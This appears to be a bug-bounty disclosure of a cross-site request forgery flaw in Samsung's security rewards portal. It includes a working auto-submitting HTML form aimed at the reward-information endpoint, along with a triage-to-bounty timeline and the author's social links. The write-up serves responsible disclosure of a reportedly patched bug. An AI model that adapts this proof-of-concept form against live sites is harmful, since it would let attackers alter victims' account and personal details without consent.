CSRF leads to Account Takeover | Samsung

Description:

Vulnerability: CSRF

Impact: The attacker can change and delete: Name for acknowledgement *, Full Name, Nationality, Country or Region of Residence, Address of Residence, Postal code, Phone number

In order to begin the reward process, information is required. And this information will be used for reward payment and tax purposes only.

csrf.html:


<form action="https://security.samsungmobile.com/saveMyRewardInfo.smsr" method="POST" name="hiSamsung">
    <input type="hidden" name="userName" value="Testing by Ando">
    <input type="hidden" name="rewardName" value="Testing by Ando">
</form>
<script>
hiSamsung.submit()
</script>

PoC video: https://youtu.be/Res3bI49wGE


Timeline:

mm/dd/yyyy

06/19/2022 - Bug Found
06/19/2022 - Submit Report
06/20/2022 - Triaged
06/29/2022 - Patching
07/07/2022 - Bounty awarded by Samsung
08/12/2022 - Close

LinkedIn: Alessandro Rumampuk
YouTube: R,ando
Facebook: Ando
Twitter: R ando

Comments